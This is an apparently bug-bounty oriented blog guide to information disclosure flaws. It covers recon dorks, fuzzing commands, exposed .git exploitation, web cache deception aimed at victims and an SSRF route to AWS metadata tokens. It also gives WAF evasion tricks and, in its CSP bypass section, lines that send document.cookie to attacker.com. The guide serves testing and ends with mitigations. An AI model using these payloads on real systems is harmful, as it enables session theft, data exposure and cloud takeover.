Post cover image

June 13, 2026

Essential Guide to Information Disclosure

Master information disclosure vulnerabilities: identify attack vectors, exploit leaks, and mitigate web security risks.

JPablo13

6 min read

1. What is Information Disclosure?

Information disclosure (Information Leakage) occurs when a web application unintentionally exposes sensitive data to unauthorized users. Its danger lies in acting as an amplifier, converting seemingly innocuous information into the entry point for critical attack chains.

|Data Type     |Exposure Example                                                    |
|--------------|--------------------------------------------------------------------|
|Credentials   |API keys in .git, HTML comments, environment variables in JS bundles|
|Infrastructure|Framework version in X-Powered-By headers, full stack traces        |
|User Data     |Web Cache Deception exposing PII, IDOR in /api/users/{id}           |
|Source Code   |Public /.git/, .DS_Store, vim .swp files, .bak backups              |
|Cloud Secrets |AWS keys in JS, GCP service accounts in repos, unexpired JWT tokens |
|Business Logic|Error messages revealing internal validation rules or SQL queries.  |

2. Impact: Where can this vulnerability lead?

The impact varies from Low to Critical. In Bug Bounty, the key is to demonstrate the chained impact, not the isolated leak.

|Severity|Impact Scenario                                                    |
|--------|-------------------------------------------------------------------|
|Critical|AWS/GCP keys leakage → full access to cloud infrastructure.        |
|Critical|Source code in /.git → logic analysis → authentication bypass.     |
|High    |Stack trace with internal paths → Path Traversal → LFI.            |
|High    |Web Cache Deception → PII exposure of multiple authenticated users.|
|Medium  |Outdated software version with a known public CVE.                 |
|Medium  |Session tokens in URLs → theft via Referer header.                 |
|Low     |X-Powered-By with an updated version (no exploitable CVE).         |

3. Reconnaissance Methodology

3.1 Passive Footprints and Historical OSINT (Vital)

Developers often delete sensitive files (.env, .bak), but search engines and historical repositories keep them. Google Dorks:

site:target.com ext:log | ext:bak | ext:sql | ext:env | ext:config
site:target.com "stack trace" | "sql syntax" | "Warning:" | "Fatal error"
"target.com" "Authorization: Bearer" site:github.com

Historical Analysis (Wayback Machine):

echo "target.com" | waybackurls | grep -iE "\.env|\.git|\.bak|\.sql|api_key"
echo "target.com" | gau --subs | grep -i "\.js$"

3.2 Active Signals

|Signal Detected                    |Probable Vulnerability                             |
|-----------------------------------|---------------------------------------------------|
|X-Powered-By: PHP/7.2 header       |Search for CVEs for that specific version.         |
|200 vs 302 response based on user  |Valid user enumeration.                            |
|Time difference (~500ms)           |Blind SQLi or enumeration.                         |
|/.git/ returns 200 or 403          |Git repository exposure → download with git-dumper.|
|Stack trace in JSON body           |Framework, internal paths, exposed SQL queries.    |
|Cache hit on routes with extensions|Web Cache Deception (e.g. /profile/me.css).        |

3.3 Tools and Automation

Fuzzing sensitive files and APIs:

ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc 200,301,403

JavaScript Analysis (Secrets and Endpoints):

subjs -i target.txt | xargs -I{} python3 LinkFinder.py -i {} -o cli
truffleHog --regex --entropy=True --json https://target.com

4. Exploitation Methodologies

4.1 Exploiting Exposed /.git

  • Verify access: curl -s [https://target.com/.git/HEAD](https://target.com/.git/HEAD) (must return ref).
  • Download repository:
git-dumper https://target.com/.git/ ./repo
  • Search for secrets across history:
git grep -i 'password\|secret\|key\|token' $(git rev-list --all)

4.2 Verbose Stack Traces and Error Messages

Techniques to trigger informative errors:

  • Unexpected types (PHP): param=Array%5B%5D%3D1
  • Null byte (C/Old PHP): param=%00
  • NoSQL probe: param={"$gt": ""}
  • Header manipulation: Accept: application/vnd.api+json

4.3 Web Cache Deception (PII Exposure)

Deceive the CDN/Cache into storing an authenticated user's private information by serving it on a static route.

  • Navigate authenticated to: [https://target.com/api/profile/me.json](https://target.com/api/profile/me.json)
  • Mutate the URL to simulate a static file: https://target.com/api/profile/me.json/nonexistent.css
  • If the response contains your data and the X-Cache: HIT header, you can send that URL to a victim so their PII is cached, and then you read it.

4.4 Cloud Metadata and Environment Variables

AWS Instance Metadata (IMDSv2 Bypass): Modern environments block IMDSv1. You need to generate a token first if you have an SSRF that allows header injection.

Bash

# Step 1: Obtain token (if SSRF allows PUT and headers)
PUT /latest/api/token HTTP/1.1
X-aws-ec2-metadata-token-ttl-seconds: 21600

# Step 2: Use the token
GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
X-aws-ec2-metadata-token: <TOKEN>

Common Debug Endpoints:

  • Spring Boot: GET /actuator/env or GET /actuator/heapdump
  • Django: GET /__debug__/

4.5 GraphQL Introspection

If GraphQL is exposed, try dumping the entire schema to discover hidden mutations or administrative fields.

{"query": "\n    query IntrospectionQuery {\n      __schema {\n        queryType { name }\n

5. Bypassing WAFs and Modern Defenses

Most WAFs detect signature-based patterns. The modern strategy is evasion through behavior, not just syntactically altering payloads.

5.1 Behavior-Based Mutation and Evasion

  • Header Spoofing for Rate Limit: X-Forwarded-For: 10.0.0.{1..255}
  • Chunked Transfer Encoding: Fragment the payload to evade WAF inspection.
Transfer-Encoding: chunked

1
/
4
.git
7
/config
0

5.2 File Access Restriction Bypass

|Technique          |Example                              |
|-------------------|-------------------------------------|
|Case variation     |/.Git/, /.GIT/, /.git/               |
|URL encoding       |/%2e%67%69%74/                       |
|Double URL encoding|/%252e%2567%2569%2574/               |
|Path normalization |/./././.git/                         |
|Trailing null byte |/.git%00                             |
|Trailing dot       |/.git./                              |
|Direct file access |/.git/index, /.git/COMMIT_EDITMSG    |
|HTTP method switch |POST /.git/config vs GET /.git/config|

5.3 CSP Bypass for Data Exfiltration

// If CSP allows public CDNs with 'unsafe-inline'
<script src='https://cdn.jsdelivr.net/npm/attacker-package'></script>

// JSONP endpoints to exfiltrate cross-origin
https://target.com/api/user?callback=fetch('https://attacker.com/?d='+document.cookie)

// DNS exfiltration when HTTP is blocked
fetch('https://'+btoa(document.cookie)+'.attacker.com')

6. Business Impact: How to Sell the Risk

|Leak Type                    |Business Impact Argument                                                                                                                             |
|-----------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------- |
|Credentials / API Keys       |Unauthorized access to internal systems. Remediation costs for compromised cloud infrastructure. GDPR/CCPA: fine risk of up to 4% of annual revenue. |
|Exposed Source Code          |Exposed intellectual property. Enables vulnerability analysis in business logic and accelerates specific 0-day attacks against the platform.         |
|User Data                    |Direct privacy violation. In financial/health platforms: PCI-DSS / HIPAA regulatory risk. Affects reputation and customer trust.                     |
|Stack traces / internal paths|Precise fingerprinting → reduces attack time from weeks to hours. Acts as a "map" for external attackers.                                            |
|User Enumeration             |Allows targeted Credential Stuffing. In financial platforms: direct fraud. Violates privacy by confirming account existence.                         |
|Active GraphQL Introspection |Full exposure of the internal data model. Allows enumerating undocumented fields and accessing hidden privileged data.                               |

7. Proof of Concept — Recommended Structure

7.1 PoC for Exposed /.git

# Step 1 — Verify exposure
curl -s https://target.com/.git/HEAD
# Expected response: ref: refs/heads/main

# Step 2 - Download and analyze repository
git-dumper https://target.com/.git/ /tmp/repo
cd /tmp/repo && git log --oneline | head -20

# Step 3 - Demonstrate impact (obtain a real credential)
git grep -i 'DB_PASSWORD\|API_KEY\|SECRET' $(git rev-list --all)

# Step 4 - Demonstrate access to a real system with that credential
# (include a screenshot with the redacted value *****)

8. Chaining Strategy (Vulnerability Chaining)

Information Disclosure is rarely the end goal. Its real value is being the first link in a chain that scales to critical impact.

|Info Disclosure (Trigger)     |Chained With:            |Final Impact                            |
|------------------------------|-------------------------|---------------------------------------|
|API key in JS bundle          |Hidden internal API calls|Unauthorized access to corporate data. |
|/.env with DB credentials     |Remote DB connection     |Full Data Breach + possible RCE.       |
|Anomalous cached response     |Web Cache Deception      |Mass theft of session tokens or PII.   |
|Stack trace with internal path|Path Traversal / LFI     |Reading /etc/passwd or code execution. |
|Active GraphQL introspection  |Hidden mutations         |Privilege escalation (e.g. updateRole).|
|Partial SSRF + cloud metadata |AWS IMDSv2 keys          |Full cloud infrastructure takeover.    |

9. Vulnerability Mitigation

|Vector               |Recommended Mitigation                                                                                                      |
| --------------------|----------------------------------------------------------------------------------------------------------------------------|
|/.git/ / Backups     |Deny access via reverse proxy rules (nginx/apache). Never serve the repository from the webroot.                            |
|Stack traces         |Disable display_errors in production. Implement a generic error handler.                                                    |
|Secrets in code      |Implement SAST scanning tools (TruffleHog, Gitleaks) in CI/CD pipelines. Use AWS Secrets Manager or HashiCorp Vault.        |
|Web Cache Deception  |Configure the CDN to cache based on Content-Type and not solely on the URL extension.                                       |
|GraphQL introspection|Disable introspection in production environments. Implement query depth validation (Depth Limiting).                        |
|Cloud Metadata       |Require IMDSv2 in AWS (forbidding tokenless calls). Block access to 169.254.169.254 from containers not requiring IAM roles.|

10. Supplementary Tables

10.1 Sensitive Files

|File / Path                           |Exposed Information                                    |
|--------------------------------------|-------------------------------------------------------|
|/.git/config                          |Remote URL with embedded credentials                   |
|/.env / /.env.local / /.env.production|All environment variables: DB, API keys                |
|/phpinfo.php                          |Complete PHP configuration, server variables           |
|/actuator/env                         |Spring Boot: complete configuration properties         |
|/actuator/heapdump                    |Spring Boot: JVM heap dump → credentials in memory     |
|/.DS_Store                            |Mac file index → directory file list                   |
|/WEB-INF/web.xml                      |Java EE: servlet configuration and mappings            |
|/server-status                        |Apache: active processes, internal IPs, processing URLs|
|/api/swagger.json / /openapi.yaml     |All API endpoints and parameters                       |
|/graphql (introspection)              |Complete schema: types, queries, mutations             |
|/__webpack_hmr                        |Webpack HMR active in production                       |
|/trace                                |Spring: full trace of the last request                 |
|/.well-known/openid-configuration     |OIDC discovery → internal auth endpoints               |

10.2 Relevant HTTP Headers

|Header            |Leaked Information                            |
|------------------|----------------------------------------------|
|X-Powered-By      |Language/framework and version                |
|Server            |Web server and version (nginx/1.14.0)         |
|X-AspNet-Version  |Exact ASP.NET version                         |
|X-Debug-Token     |Symfony: Profiler enabled in production       |
|X-Runtime         |Rails: processing time (timing oracle)        |
|Via               |Internal proxies in the network path          |
|X-Forwarded-Server|Backend server hostname                       |
|X-Cache           |CDN/proxy caching info → internal architecture|
|CF-Ray            |Cloudflare Ray ID → confirms CDN usage        |

10.3 Verifiable Cloud-Native / Kubernetes Endpoints

/api/v1/namespaces          # Open K8s API → full cluster access
/metrics                    # Public Prometheus endpoint → infrastructure data
/.well-known/openid-configuration  # OIDC discovery
/healthz / /readyz          # May expose info about internal components
/debug/pprof                # Go: active HTTP profiling handler in production

Connect with me

Support Me ☕

If you found this useful, I would appreciate it if you would follow me and support the content.